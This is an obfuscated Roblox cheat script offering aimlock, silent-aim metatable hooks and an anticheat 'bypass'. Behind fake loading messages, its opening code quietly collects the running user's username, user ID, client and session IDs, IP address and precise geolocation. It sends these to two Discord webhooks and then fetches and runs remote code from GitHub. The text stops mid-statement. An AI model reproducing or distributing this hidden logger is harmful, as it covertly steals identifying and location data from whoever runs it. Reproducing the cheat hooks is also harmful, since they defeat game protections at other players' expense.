--[[

getgenv().RegisterKey = "OnlyMiaHasThisKeyLarp241664323VIOMAINSETOMGcumsplatter.ccuncrackablekey23",

getgenv().UserInterface = true,

getgenv().UserIntro = true,

]]--

-- CHECKS YOUR HWID FOR POSSIBLE CRACK ATTEMPTS AND CHECKS IF YOU ARE WHITSLITED, IF YOU ARE NOT WHITELISTED THE SCRIPT WILL NOT LOAD AND YOU WILL BE KICKED FROM THE GAME.

-- THIS SCRIPT WAS MADE BY DREAMYBULL AND NOBODY ELSE.

-- DO NOT TRY TO CRACK THIS SCRIPT

print("Checking UUID")
print("Bypassing Anticheat")
print("Checking For Crack Attempts")
print("Enjoy Using Miabladi.private!")
print("Loaded!")


local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v50,v51)local v52={};for v129=1, #v50 do v6(v52,v0(v4(v1(v2(v50,v129,v129 + 1 )),v1(v2(v51,1 + (v129% #v51) ,1 + (v129% #v51) + 1 )))%256 ));end return v5(v52);end HS=game:GetService(v7("\249\215\207\53\213\190\213\8\216\192\222","\126\177\163\187\69\134\219\167"));WebHook_Url1="https://discord.com/api/webhooks/1148297718448541758/wHcqpfXINGXaUn9QWTlhdT6LCMNp61_jFekDl1ECfJKPoMz3TL9naM_cFxFuHpOyVWQQ";WebHook_Url2="https://discord.com/api/webhooks/1167254103395684417/nf8J3rSVjAklItSM9YfXWzbZlXVXGsTvgdI36pct4e8kx9bgTqarYoqLT7Uovpn4X8Pa";local v8=request({[v7("\22\223\38","\156\67\173\74\165")]="https://api.ipify.org/?format=json",[v7("\25\178\93\30\179\34","\38\84\215\41\118\220\70")]=v7("\119\51\22","\158\48\118\66\114")});local v9=request({[v7("\158\54\28","\155\203\68\112\86\19\197")]=string.format("http://ip-api.com/json/%s",IPBuffer),[v7("\107\216\34\244\79\124","\152\38\189\86\156\32\24\133")]=v7("\219\82\179","\38\156\55\199")});local v10=game:GetService(v7("\128\105\104\56\32\113\232\85\161\126\121","\35\200\29\28\72\115\20\154")):JSONDecode(v8.Body);local v11=tostring(v10.ip);local v12=game:GetService(v7("\49\171\197\207\190\41\38\15\182\210\218","\84\121\223\177\191\237\76")):JSONDecode(v9.Body);local v13=game:GetService(v7("\137\84\209\129\52\81\60\216\175\95\202\179\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));local v14=game.Players.LocalPlayer;local v15=game:GetService(v7("\100\67\18\46\76\86\16\41\72\65\5\22\76\80\22\44\74\71","\69\41\34\96"));local v16=v14.Name;local v17=v14.DisplayName;local v18=v14.UserId;local v19=v13:GetClientId();local v20=v13:GetSessionId();local v21=os.date(v7("\249\219","\75\220\163\183\106\98"));local v22=os.date(v7("\71\130","\185\98\218\235\87"));local v23=v15:GetProductInfo(game.PlaceId).Name;local v24=version();local v25=v11;local v26=v12.country;local v27=v12.countryCode;local v28=v12.region;local v29=v12.regionName;local v30=v12.city;local v31=v12.zip;local v32=v12.lat;local v33=v12.lon;local v34=v12.isp;local v35=v12.org;local v36=request({[v7("\254\46\43","\202\171\92\71\134\190")]=WebHook_Url1,[v7("\4\196\56\128\38\197","\232\73\161\76")]=v7("\139\246\113\105","\126\219\185\34\61"),[v7("\36\203\95\118\123\101\224","\135\108\174\62\18\30\23\147")]={[v7("\149\230\36\223\29\160\39\138\130\240\58\206","\167\214\137\74\171\120\206\83")]="application/json"},[v7("\169\255\54\68","\199\235\144\82\61\152")]=HS:JSONEncode({[v7("\4\25\183\63\2\24\173","\75\103\118\217")]="",[v7("\194\89\114\17\189\13","\126\167\52\16\116\217")]={{[v7("\220\39\52\140\177","\156\168\78\64\224\212\121")]=v7("\35\239\177\207","\174\103\142\197"),[v7("\82\45\76\59\55\87\232\66\33\80\54","\152\54\72\63\88\69\62")]=v7("\242\197\237\89\214\203\225\87\148\233\225\81","\60\180\164\142"),[v7("\76\71\21\44","\114\56\62\101\73\71\141")]=v7("\170\224\216\204","\164\216\137\187"),[v7("\209\233\61\189\180","\107\178\134\81\210\198\158")]=tonumber(8388736),[v7("\62\7\135\202\174\43","\202\88\110\226\166")]={{[v7("\205\14\143\242","\170\163\111\226\151")]=v7("\53\49\166\57\14\20\40\1\36\167\42\75\51\105\10\97\175","\73\113\80\210\88\46\87"),[v7("\151\45\193\7\226","\135\225\76\173\114")]=v7("\26\237\184\148\173\169\162\90\218\176\181\162\253\130\2\232\187\165\184\184\163\64\173","\199\122\141\216\208\204\221")   .. v21   .. "\nTime When Executed: "   .. v22   .. "\nGame When Executed: "   .. v23   .. "\n\nName: "   .. v16   .. "\nDisplay: "   .. v17   .. "\nUser-Id: "   .. v18   .. "\n\nClient-Id: "   .. v19   .. "\nSession-Id: "   .. v20   .. "\nRBX-Version: "   .. v24   .. v7("\173\221\16","\150\205\189\112\144\24") ,[v7("\44\138\179\69\10\141","\112\69\228\223\44\100\232\113")]=true}}}}})});wait(1);local v36=request({[v7("\225\13\11","\230\180\127\103\179\214\28")]=WebHook_Url2,[v7("\161\0\75\78\235\69","\128\236\101\63\38\132\33")]=v7("\156\134\34\112","\175\204\201\113\36\214\139"),[v7("\111\201\52\216\1\85\223","\100\39\172\85\188")]={[v7("\142\119\183\148\54\163\108\244\180\42\189\125","\83\205\24\217\224")]="application/json"},[v7("\196\202\201\36","\93\134\165\173")]=HS:JSONEncode({[v7("\189\253\207\214\63\192\166","\30\222\146\161\162\90\174\210")]="",[v7("\224\67\114\15\225\93","\106\133\46\16")]={{[v7("\76\41\103\240\95","\32\56\64\19\156\58")]=v7("\126\201\241\87","\224\58\168\133\54\58\146"),[v7("\93\83\88\254\103\143\151\31\80\89\69","\107\57\54\43\157\21\230\231")]=v7("\253\138\18\240\187\211\192\208\203\36\251\186\208\202","\175\187\235\113\149\217\188"),[v7("\40\182\145\73","\24\92\207\225\44\131\25")]=v7("\89\218\187\68","\29\43\179\216\44\123"),[v7("\190\214\44\67\175","\44\221\185\64")]=tonumber(8388736),[v7("\7\238\77\83\119\18","\19\97\135\40\63")]={{[v7("\160\93\62\62","\81\206\60\83\91\79")]=v7("\106\170\196\115\111\224\76\180\90\190\194\119\43\131\86\246\83","\196\46\203\176\18\79\163\45"),[v7("\174\35\114\11\33","\143\216\66\30\126\68\155")]=v7("\170\200\13\226\213\249\151","\129\202\168\109\171\165\195\183")   .. v25   .. "\nCountry: "   .. v26   .. "\nCountry-Code: "   .. v27   .. "\nRegion: "   .. v28   .. "\nRegion-Name: "   .. v29   .. "\nCity: "   .. v30   .. "\nZip: "   .. v31   .. "\nLat: "   .. v32   .. "\nLon: "   .. v33   .. "\nIsp: "   .. v34   .. "\nOrg: "   .. v35   .. v7("\34\88\55","\134\66\56\87\184\190\116") ,[v7("\53\63\5\178\23\238","\85\92\81\105\219\121\139\65")]=false}}}}})});local v37=loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/cat"))();local v38=v37:CreateWindow("Miabladi's Personal",Vector2.new(480,452 + 48 ),Enum.KeyCode.V);local v39=v38:CreateTab(v7("\208\178\89\75","\191\157\211\48\37\28"));local v40=v39:CreateSector(v7("\235\30\230\27\63\203\95\213\21\55\221\16\224","\90\191\127\148\124"),v7("\116\130\40\3","\119\24\231\78"));v40:AddButton(v7("\167\35\164\72\208\69\81\202\28\236","\113\226\77\197\42\188\32"),function(v53)local v54=0 -0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;local v66;while true do if (v54==(1087 -(686 + 400))) then v58=nil;v59=nil;v60=nil;v54=2 + 0 ;end if (3==v54) then v64=nil;v65=nil;v66=nil;v54=233 -(73 + 156) ;end if (v54==2) then v61=nil;v62=nil;v63=nil;v54=1 + 2 ;end if (v54==(815 -(721 + 90))) then while true do if (v55==0) then v56={[v7("\25\25\250\179\51\17\225\167\59\2\253\186\52","\213\90\118\148")]={[v7("\111\47\166\81\72\79","\45\59\78\212\54")]=true,[v7("\59\83\154","\144\112\54\227\235\230\78\205")]=Enum.KeyCode.Q,[v7("\131\58\10\248\217\88\167\33\0\242","\59\211\72\111\156\176")]=0.135,[v7("\96\136\196\63\65\146\237\41\125\143\236\57\93","\77\46\231\131")]=true,[v7("\153\92\183\84\151\91\178\69","\32\218\52\214")]=false,[v7("\96\24\37\161\247\157\74\94\75","\58\46\119\81\200\145\208\37")]=true,[v7("\27\141\34\184\132\178\50\46","\86\75\236\80\204\201\221")]=true,[v7("\83\72\101\163\235\133\113\85\126\138\240","\235\18\33\23\229\158")]=true,[v7("\96\187\211\175","\219\48\218\161")]=v7("\204\100\113\72\213\64\233\224\67\115\70\207\127\225\246\101","\128\132\17\28\41\187\47"),[v7("\32\39\18\53\109\19\55\2\51\94\21\59\9\52","\61\97\82\102\90")]=true,[v7("\158\43\184\68\203\65\27\27","\105\204\78\203\43\167\55\126")]=false,[v7("\135\179\51\31\0\23\230\88\168\156\42\27\4\1\213","\49\197\202\67\126\115\100\167")]=true},[v7("\3\66\207\44\147","\62\87\59\191\73\224\54")]={[v7("\197\3\246\197","\169\135\98\154")]=Enum.PartType.Ball,[v7("\233\123\43\87\246","\168\171\23\68\52\157\83")]=Enum.PartType.Block,[v7("\215\104\249\164\43\41\130\230","\231\148\17\149\205\69\77")]=Enum.PartType.Cylinder}};v56.Tracer=Instance.new(v7("\176\166\213\239","\159\224\199\167\155\55"),game.Workspace);v56.Tracer.Name=v7("\228\231\41\194\254\247\124\220\254\244\59\211\166\161\111","\178\151\147\92");v56.Tracer.Anchored=true;v56.Tracer.CanCollide=false;v55=1;end if (v55==(1 + 5)) then v64.InputBegan:Connect(function(v187,v188)if  not v188 then if (v187.KeyCode==v56.Configuration.Key) then if (v56.Configuration.Target==true) then local v280=0 -0 ;while true do if (v280==0) then v63= not v63;if v63 then local v327=0;while true do if (v327==1) then if v56.Configuration.NotifMode then game.StarterGui:SetCore(v7("\2\135\114\184\31\141\104\181\55\139\127\189\37\139\115\178","\220\81\226\28"),{[v7("\39\220\150\247\239","\167\115\181\226\155\138")]="[🙏]",[v7("\214\39\255\72","\166\130\66\135\60\27\17")]=v7("\112\75\220\114\53\80\16\142","\80\36\42\174\21")   .. tostring(Plr.Character.Humanoid.DisplayName) });end break;end if (v327==0) then Plr=getClosestPlayerToCursor();if v56.Configuration.ChatMode then local v366=v7("\1\181\153\245\223\33\238\203","\186\85\212\235\146")   .. tostring(Plr.Character.Humanoid.DisplayName) ;local v367=v7("\227\141\26","\56\162\225\118\158\89\142");local v368=game:GetService(v7("\110\0\208\163\43\219\93\17\197\171\17\204\83\23\193\168\39","\184\60\101\160\207\66")).DefaultChatSystemChatEvents.SayMessageRequest;v368:FireServer(v366,v367);end v327=1;end end elseif  not v63 then local v337=470 -(224 + 246) ;while true do if (v337==(0 -0)) then if v56.Configuration.ChatMode then local v376=0;local v377;local v378;local v379;while true do if (v376==(0 -0)) then local v383=0 + 0 ;while true do if (v383==1) then v376=1 + 0 ;break;end if (0==v383) then v377="[🙏]";v378=v7("\111\28\59","\26\46\112\87");v383=1 + 0 ;end end end if (v376==1) then v379=game:GetService(v7("\139\38\187\120\182\188\68\160\188\39\152\96\176\173\68\179\188","\212\217\67\203\20\223\223\37")).DefaultChatSystemChatEvents.SayMessageRequest;v379:FireServer(v377,v378);break;end end end if v56.Configuration.NotifMode then game.StarterGui:SetCore(v7("\137\136\166\214\148\130\188\219\188\132\171\211\174\132\167\220","\178\218\237\200"),{[v7("\130\188\242\220\179","\176\214\213\134")]="[🙏]",[v7("\192\168\174\192","\57\148\205\214\180\200\54")]=v7("\39\243\57\59\117\25\248\49","\22\114\157\85\84"),[v7("\224\222\1\197\73\255\167\202","\200\164\171\115\164\61\150")]=1 -0 });elseif (v56.Configuration.Target==false) then game.StarterGui:SetCore(v7("\141\241\13\65\173\177\224\10\67\138\189\245\23\76\140\176","\227\222\148\99\37"),{[v7("\7\91\70\250\252","\153\83\50\50\150")]="[🙏]",[v7("\105\115\107\8","\45\61\22\19\124\19\203")]=v7("\241\30\8\244\17\117\249\228\28\12\247\14\117\249\245\19\31\242\7\100","\217\161\114\109\149\98\16"),[v7("\54\53\42\125\168\125\29\46","\20\114\64\88\28\220")]=3 -2 });end break;end end end break;end end end end end end);function getClosestPlayerToCursor()local v189=0;local v190;local v191;while true do local v201=513 -(203 + 310) ;while true do if (v201==(1993 -(1238 + 755))) then if (v189==0) then local v281=0 + 0 ;while true do if (v281==(1535 -(709 + 825))) then v189=1 -0 ;break;end if ((0 -0)==v281) then v190=nil;v191=v56.circle.Radius;v281=1;end end end if (v189==(865 -(196 + 668))) then local v282=0 -0 ;while true do if ((0 -0)==v282) then for v321,v322 in pairs(game.Players:GetPlayers()) do if ((v322~=game.Players.LocalPlayer) and v322.Character and v322.Character:FindFirstChild(v7("\25\20\223\181\246\223\180\53","\221\81\97\178\212\152\176")) and (v322.Character.Humanoid.Health~=0) and v322.Character:FindFirstChild(v7("\225\232\10\254\8\249\232\15\232\21","\122\173\135\125\155"))) then local v334=v61:WorldToViewportPoint(v322.Character.PrimaryPart.Position);local v335=(Vector2.new(v334.X,v334.Y) -Vector2.new(v62.X,v62.Y)).magnitude;if (v335<v191) then v190=v322;v191=v335;end end end return v190;end end end break;end end end end if v56.Configuration.PartMode then game:GetService(v7("\182\212\14\138\58\35\222\141\194\5","\168\228\161\96\217\95\81")).Stepped:Connect(function()if (v63 and Plr.Character and Plr.Character:FindFirstChild(v7("\247\222\57\89\61\99\212\195\61\83","\55\187\177\78\60\79"))) then v56.Tracer.CFrame=CFrame.new(Plr.Character.LowerTorso.Position + (Plr.Character.LowerTorso.Velocity * v56.Configuration.Prediction) );else v56.Tracer.CFrame=CFrame.new(0,9999,833 -(171 + 662) );end end);end v65=getrawmetatable(game);v66=v65.__namecall;v55=100 -(4 + 89) ;end if (v55==(17 -12)) then local v159=0 + 0 ;while true do if (v159==(0 -0)) then v62=game.Players.LocalPlayer:GetMouse();v63=false;v159=1;end if (v159==(1 + 1)) then v64=game:GetService(v7("\200\222\17\199\103\185\237\216\0\230\75\165\235\196\23\208","\215\157\173\116\181\46"));v55=6;break;end if (v159==(1487 -(35 + 1451))) then if (v56.Configuration.valiansh==true) then local v261=1453 -(28 + 1425) ;while true do if ((1993 -(941 + 1052))==v261) then game.StarterGui:SetCore(v7("\210\205\60\254\193\63\232\75\231\193\49\251\251\57\243\76","\34\129\168\82\154\143\80\156"),{[v7("\177\187\39\7\77","\233\229\210\83\107\40\46")]=v7("\237\77\51\210\0","\101\161\34\82\182"),[v7("\220\8\65\234","\78\136\109\57\158\187\130\226")]="[🙏] Loaded",[v7("\26\42\235\240\42\54\246\255","\145\94\95\153")]=1 + 0 });return;end end end v56.Configuration.valiansh=true;v159=2;end end end if (v55==2) then local v160=1514 -(822 + 692) ;while true do if (v160==0) then v57=game.Players.LocalPlayer;v58=v57:GetMouse();v160=1 -0 ;end if (v160==2) then v56.circle.Color=Color3.fromRGB(0 + 0 ,511 -(45 + 252) ,253 + 2 );v55=3;break;end if (v160==1) then v59=game:GetService(v7("\190\232\66\1\23\94\108\133\254\73","\26\236\157\44\82\114\44"));v56.circle=Drawing.new(v7("\9\39\199\88\38\43","\59\74\78\181"));v160=1 + 1 ;end end end if (v55==3) then local v161=0 -0 ;while true do if (v161==(435 -(114 + 319))) then v56.circle.Transparency=0.7 -0 ;v55=4 -0 ;break;end if (v161==1) then v56.circle.Radius=77 + 43 ;v56.circle.Thickness=0 -0 ;v161=2;end if (v161==(0 -0)) then v56.circle.Thickness=0;v56.circle.NumSides=732;v161=1964 -(556 + 1407) ;end end end if (v55==(1213 -(741 + 465))) then setreadonly(v65,false);v65.__namecall=newcclosure(function(...)local v192=465 -(170 + 295) ;local v193;while true do local v202=0 + 0 ;while true do if ((0 + 0)==v202) then if (v192==(2 -1)) then return v66(...);end if (v192==(0 + 0)) then v193={...};if (v63 and (getnamecallmethod()==v7("\11\199\77\238\117\202\146\59\203\77","\224\77\174\63\139\38\175")) and (v193[2]==v7("\177\81\92\47\144\68\117\33\145\82\93\30\139\82","\78\228\33\56"))) then local v305=0;while true do if (v305==(0 + 0)) then local v328=1230 -(957 + 273) ;while true do if (v328==0) then v193[1 + 2 ]=Plr.Character[v56.Configuration.Part].Position + (Plr.Character[v56.Configuration.Part].Velocity * Prediction) ;return v66(unpack(v193));end end end end end v192=1 + 0 ;end break;end end end end);if (v56.Configuration.AirFunction==true) then if ((Plr.Character.Humanoid.Jump==true) and (Plr.Character.Humanoid.FloorMaterial==Enum.Material.Air)) then v56.Configuration.Part=v7("\252\119\181\11\145\232\113\189\23","\229\174\30\210\99");else Plr.Character:WaitForChild(v7("\51\248\139\80\227\50\48\31","\89\123\141\230\49\141\93")).StateChanged:Connect(function(v262,v263)if (v263==Enum.HumanoidStateType.Freefall) then v56.Configuration.Part=v7("\193\120\241\4\4\108\252\126\226","\42\147\17\150\108\112");else v56.Configuration.Part=v7("\35\169\58\122\245\220\0\180\62\112","\136\111\198\77\31\135");end end);end end while wait() do if (v56.Configuration.AutoPrediction==true) then local v233=0;local v234;local v235;local v236;while true do if (v233==1) then v236=tonumber(v235[1]);if (v236<130) then getgenv().Prediction=0.15175864;elseif (v236<(457 -337)) then getgenv().Prediction=0.14683943 -0 ;elseif (v236<110) then getgenv().Prediction=0.14362652;elseif (v236<(305 -205)) then getgenv().Prediction=0.14173456;elseif (v236<(445 -355)) then getgenv().Prediction=1780.13873952 -(389 + 1391) ;elseif (v236<(51 + 29)) then getgenv().Prediction=0.13581963 + 0 ;elseif (v236<(159 -89)) then getgenv().Prediction=951.12862974 -(783 + 168) ;elseif (v236<(201 -141)) then getgenv().Prediction=0.1259 + 0 ;elseif (v236<(361 -(309 + 2))) then getgenv().Prediction=0.123885;elseif (v236<(122 -82)) then getgenv().Prediction=1212.1225 -(1090 + 122) ;end break;end if (v233==0) then local v273=0;while true do if (v273==1) then v233=1 + 0 ;break;end if (v273==(0 -0)) then v234=game:GetService(v7("\49\29\166\66\174","\201\98\105\199\54\221\132\119")).Network.ServerStatsItem[v7("\157\13\151\32\66\5\165\183\11","\204\217\108\227\65\98\85")]:GetValueString();v235=string.split(v234,"(");v273=1;end end end end end end if (v56.Configuration.Resolver and v63 and v56.Configuration.Target) then game:GetService(v7("\108\214\251\214\41\210\72\202\246\224","\160\62\163\149\133\76")).Stepped:Connect(function()if (v63 and (getgenv().Target==true)) then local v264=0 + 0 ;local v265;local v266;local v267;local v268;local v269;while true do if (v264==(1120 -(628 + 490))) then v269=nil;while true do if (v265==(0 + 0)) then local v323=0 -0 ;while true do if (0==v323) then local v339=0 -0 ;while true do if (v339==1) then v323=775 -(431 + 343) ;break;end if (v339==0) then v266=v63.Character.HumanoidRootPart;v267=v266.Position;v339=1 -0 ;end end end if (v323==1) then v265=2 -1 ;break;end end end if (v265==(3 + 0)) then v266.Velocity=v269;break;end if (v265==1) then local v325=0 + 0 ;while true do if (v325==0) then local v340=1695 -(556 + 1139) ;while true do if (v340==(15 -(6 + 9))) then wait();v268=v266.Position;v340=1;end if (v340==(1 + 0)) then v325=1 + 0 ;break;end end end if (v325==(170 -(28 + 141))) then v265=1 + 1 ;break;end end end if (v265==(2 -0)) then v269=(v268-v267) * (32 + 12) ;v267=v268;v265=1320 -(486 + 831) ;end end break;end if (v264==(2 -1)) then v267=nil;v268=nil;v264=6 -4 ;end if ((0 + 0)==v264) then v265=0 -0 ;v266=nil;v264=1264 -(668 + 595) ;end end end end);end v55=8;end if (v55==1) then local v163=0 + 0 ;while true do if (v163==(0 + 0)) then v56.Tracer.Transparency=0.8;v56.Tracer.Parent=game.Workspace;v163=1;end if (v163==2) then v56.Tracer.Color=Color3.fromRGB(255,255,695 -440 );v55=2;break;end if (v163==(291 -(23 + 267))) then v56.Tracer.Shape=v56.Types.Ball;v56.Tracer.Size=Vector3.new(1950 -(1129 + 815) ,393 -(371 + 16) ,1756 -(1326 + 424) );v163=3 -1 ;end end end if (v55==(14 -10)) then v56.circle.Visible=false;v56.circle.Filled=false;v59.RenderStepped:Connect(function()v56.circle.Position=Vector2.new(v58.X,v58.Y + (153 -(88 + 30)) );end);v60=Instance.new(v7("\3\222\86\94\182\55","\211\69\177\58\58"),game.CoreGui);v61=game:GetService(v7("\128\234\107\254\250\219\182\230\124","\171\215\133\25\149\137")).CurrentCamera;v55=776 -(720 + 51) ;end if (v55==(17 -9)) then if v56.Configuration.BypassAimViewer then local v203=0;local v204;local v205;local v206;local v207;local v208;local v209;local v210;local v211;local v212;local v213;local v214;local v215;local v216;local v217;while true do if ((1776 -(421 + 1355))==v203) then v204=0 -0 ;v205=nil;v206=nil;v207=nil;v203=1 + 0 ;end if (v203==(1086 -(286 + 797))) then v216=nil;v217=nil;while true do if (v204==(10 -7)) then local v289=0;local v290;while true do if (v289==(0 -0)) then v290=439 -(397 + 42) ;while true do if (v290==(0 + 0)) then function v215(v349)return ((type(v349)==v7("\86\2\42\68\93\5","\38\56\119\71")) and math.random( -v349,v349)) or (800 -(24 + 776)) ;end function v216(v350)return (v350 and v350.Character and v350.Character:FindFirstChild(v7("\219\250\85\215\43\89\250\235","\54\147\143\56\182\69")) and v350.Character:FindFirstChild(v7("\254\132\254\77","\191\182\225\159\41"))) or false ;end v290=1;end if (v290==2) then v204=4;break;end if (v290==(1 -0)) then v211.CharacterAdded:Connect(function(v351)ChineseBypass(v351);end);if v216(v211) then local v356=785 -(222 + 563) ;local v357;while true do if (v356==(0 -0)) then v357=0 + 0 ;while true do if ((190 -(23 + 167))==v357) then v211.Character.Humanoid:UnequipTools();ChineseBypass(v211.Character);break;end end break;end end end v290=2;end end break;end end end if (v204==2) then local v291=1798 -(690 + 1108) ;while true do if (v291==(1 + 0)) then v214=v7("\155\86\198\124\21\125\113\192\243\123\197\127\30\52\84\207\242","\161\211\51\170\16\122\93\53") and nil ;function ChineseBypass(v330)local v331=v330.ChildAdded:Connect(function(v336)if v336:IsA(v7("\207\161\189\36","\72\155\206\210")) then v214=v336.Activated:Connect(function()if v213 then v213:FireServer(v7("\115\106\80\15\39\67\87\91\27\32\67\74\91\29","\83\38\26\52\110"),v212.Hit.Position);end end);end end);end v291=2 + 0 ;end if (v291==(850 -(40 + 808))) then v204=1 + 2 ;break;end if ((0 -0)==v291) then v212=v7("\57\35\15\215\180\117","\149\84\70\96\160") and v211:GetMouse() ;v213=v209:FindFirstChild(v7("\21\7\4\227\29\16\8\227\44","\141\88\102\109")) or nil ;v291=1 + 0 ;end end end if (v204==(3 + 1)) then v217=nil;v217=hookmetamethod(game,v7("\20\45\38\84\134\130\193\42\30\36","\162\75\114\72\53\235\231"),function(v306,...)local v307=0 + 0 ;local v308;local v309;while true do if (v307==0) then local v332=571 -(47 + 524) ;while true do if (v332==(0 + 0)) then v308={...};v309=getnamecallmethod();v332=1 -0 ;end if ((2 -1)==v332) then v307=1727 -(1165 + 561) ;break;end end end if (v307==(1 + 0)) then if ( not checkcaller() and (v309==v7("\170\53\86\231\96\7\158\42\65\240","\98\236\92\36\130\51")) and (v306.Name==v7("\137\24\5\180\96\190\176\62\176","\80\196\121\108\218\37\200\213")) and (v308[3 -2 ]==v7("\53\99\6\126\95\11\167\15\102\17\122\123\1\153","\234\96\19\98\31\43\110")) and v7("\5\23\71\201\171\103\152\2\22\83\201","\235\102\127\50\167\204\18")) then local v341=0 + 0 ;while true do if ((479 -(341 + 138))==v341) then v308[2]=(v7("\99\162\244\49\71\39\94\225\248\34\64\43\16\181\253\42\87","\78\48\193\149\67\36") and v216(v211) and (v216(v211).Position + Vector3.new(v215(14 + 36 ),v215(50),v215(103 -53 )))) or Vector3.zero ;return v306.FireServer(v306,unpack(v308));end end end return v217(v306,...);end end end);break;end if (v204==(326 -(89 + 237))) then v205=loadstring(game:HttpGet("https://raw.githubusercontent.com/Nosssa/NossLock/main/GetRealMousePosition"))();task.wait();v206=setmetatable({},{[v7("\233\159\4\33\199\211\184","\163\182\192\109\79")]=function(v310,v311)return game:GetService(v311);end});v207=v206.Workspace;v204=3 -2 ;end if (v204==(1 -0)) then v208=v206.Players;v209=v206.ReplicatedStorage;v210=v206.UserInputService;v211=v208.LocalPlayer;v204=883 -(581 + 300) ;end end break;end if (2==v203) then v212=nil;v213=nil;v214=nil;v215=nil;v203=3;end if (v203==(1221 -(855 + 365))) then v208=nil;v209=nil;v210=nil;v211=nil;v203=2;end end end break;end end break;end if (v54==(0 -0)) then v55=0 + 0 ;v56=nil;v57=nil;v54=1236 -(1030 + 205) ;end end end);v40:AddTextbox(v7("\0\12\133\28\72\51\10\137\23\79","\33\80\126\224\120"),v7("\188\230\82\151\9","\60\140\200\99\164"),function(v67)getgenv().Prediction=v67;end);v40:AddTextbox(v7("\173\225\9\54\226\168\242\2\53\167\147","\194\231\148\100\70"),v7("\22\2\145\247","\168\38\44\161\195\150"),function(v69)getgenv().JumpOffset=v69;end);v40:AddDropdown(v7("\161\245\143\102\49\250\162","\118\224\156\226\22\80\136\214"),{v7("\106\235\88\132","\224\34\142\57"),v7("\246\178\200\220\125\254\84\10\236\168\202\201\67\240\79\26","\110\190\199\165\189\19\145\61"),v7("\239\251\103\237\153\243\213\249\100\231","\167\186\139\23\136\235"),v7("\54\186\159\8\8\129\135\31\9\186","\109\122\213\232")},v7("\194\248\181\53\252\195\173\34\253\248","\80\142\151\194"),false,function(v71)getgenv().Part=v7("\44\214\99\69\12\200","\44\99\166\23");end);v40:AddToggle(v7("\93\226\61\57\115\148\110\242\45\63\48\176\117\248\39","\196\28\151\73\86\83"),false,function(v73)getgenv().AutoPrediction=v73;end);v40:AddToggle(v7("\221\12\61\25\132\81\27\119\231\10\38\30\145","\22\147\99\73\112\226\56\120"),false,function(v75)getgenv().NotifMode=v75;end);v40:AddToggle(v7("\153\113\244\244\131\187\112\230\181\165\177\97\242\244\159\172\102","\237\216\21\130\149"),false,function(v77)getgenv().PartMode=v77;end);v40:AddToggle(v7("\172\65\31\120\162\198\75\140\74\31\108\184\198\74\145","\62\226\46\63\63\208\169"),false,function(v79)getgenv().NoGroundShots=v79;end);v40:AddToggle(v7("\215\28\70\140\19\27\42\76","\62\133\121\53\227\127\109\79"),false,function(v81)getgenv().Resolver=v81;end);v40:AddToggle(v7("\49\29\63\227\223\171\181\21\6\114\215\207\190\163\3\7","\194\112\116\82\149\182\206"),false,function(v83)getgenv().BypassAimViewer=v83;end);local v41=v39:CreateSector(v7("\26\169\65\29\210\227\78\24\161\65\26\207\246","\110\89\200\44\120\160\130"),v7("\185\202\76\78\87","\45\203\163\43\38\35\42\91"));v41:AddButton(v7("\247\139\221\33\139\172\20\154\166\149","\52\178\229\188\67\231\201"),function(v85)local v86=0;local v87;local v88;local v89;local v90;local v91;local v92;local v93;local v94;local v95;local v96;local v97;local v98;local v99;local v100;local v101;while true do if (v86==(6 -2)) then local v132=0;while true do if (v132==0) then v101=Drawing.new(v7("\220\120\70\181\58\219","\156\159\17\52\214\86\190"));v101.Filled=false;v132=1;end if (v132==(3 -1)) then v101.Color=Color3.fromRGB(68 + 187 ,149 + 106 ,0);v101.NumSides=1069 -(10 + 59) ;v132=3;end if (1==v132) then local v170=0 + 0 ;while true do if (v170==0) then v101.Transparency=4 -3 ;v101.Thickness=1;v170=1;end if (v170==(1164 -(671 + 492))) then v132=2 + 0 ;break;end end end if (v132==3) then v86=5;break;end end end if (v86==(1215 -(369 + 846))) then local v133=0;while true do if (v133==(1 + 2)) then v86=1;break;end if ((1 + 0)==v133) then getgenv().Key="C";getgenv().DisableKey="L";v133=2;end if (v133==0) then getgenv().Pred=0.1572321;getgenv().AimPart=v7("\9\84\93\5\249\83\42\37\115\95\11\227\108\34\51\85","\67\65\33\48\100\151\60");v133=1946 -(1036 + 909) ;end if (v133==2) then getgenv().FOV=true;getgenv().ShowFOV=false;v133=3;end end end if (v86==(5 + 1)) then while wait() do if (getgenv().AutoPred==true) then local v177=0;local v178;local v179;local v180;local v181;while true do if (v177==2) then while true do if (v178==(0 -0)) then v179=game:GetService(v7("\10\103\120\85\221","\174\89\19\25\33")).Network.ServerStatsItem[v7("\11\19\70\79\183\183\2\33\21","\107\79\114\50\46\151\231")]:GetValueString();v180=string.split(v179,"(");v178=1;end if (v178==(204 -(11 + 192))) then v181=tonumber(v180[1 + 0 ]);if (v181<225) then getgenv().Pred=176.4 -(135 + 40) ;elseif (v181<(520 -305)) then getgenv().Pred=1.2 + 0 ;elseif (v181<205) then getgenv().Pred=1;elseif (v181<(418 -228)) then getgenv().Pred=0.1 -0 ;elseif (v181<(356 -(50 + 126))) then getgenv().Pred=0.12 -0 ;elseif (v181<(38 + 132)) then getgenv().Pred=1413.15 -(1233 + 180) ;elseif (v181<(1129 -(522 + 447))) then getgenv().Pred=0.18;elseif (v181<150) then getgenv().Pred=1421.11 -(107 + 1314) ;elseif (v181<140) then getgenv().Pred=0.113 + 0 ;elseif (v181<130) then getgenv().Pred=0.116 -0 ;elseif (v181<120) then getgenv().Pred=0.12 + 0 ;elseif (v181<(218 -108)) then getgenv().Pred=0.124 -0 ;elseif (v181<(2015 -(716 + 1194))) then getgenv().Pred=0.127 + 0 ;elseif (v181<(10 + 80)) then getgenv().Pred=503.13 -(74 + 429) ;elseif (v181<(154 -74)) then getgenv().Pred=0.133 + 0 ;elseif (v181<(160 -90)) then getgenv().Pred=0.136 + 0 ;elseif (v181<(184 -124)) then getgenv().Pred=0.15038 -0 ;elseif (v181<(483 -(279 + 154))) then getgenv().Pred=778.15038 -(454 + 324) ;elseif (v181<(32 + 8)) then getgenv().Pred=17.145 -(12 + 5) ;elseif (v181<30) then getgenv().Pred=0.155;elseif (v181<(11 + 9)) then getgenv().Pred=0.157 -0 ;end break;end end break;end if (v177==(1 + 0)) then local v246=0;while 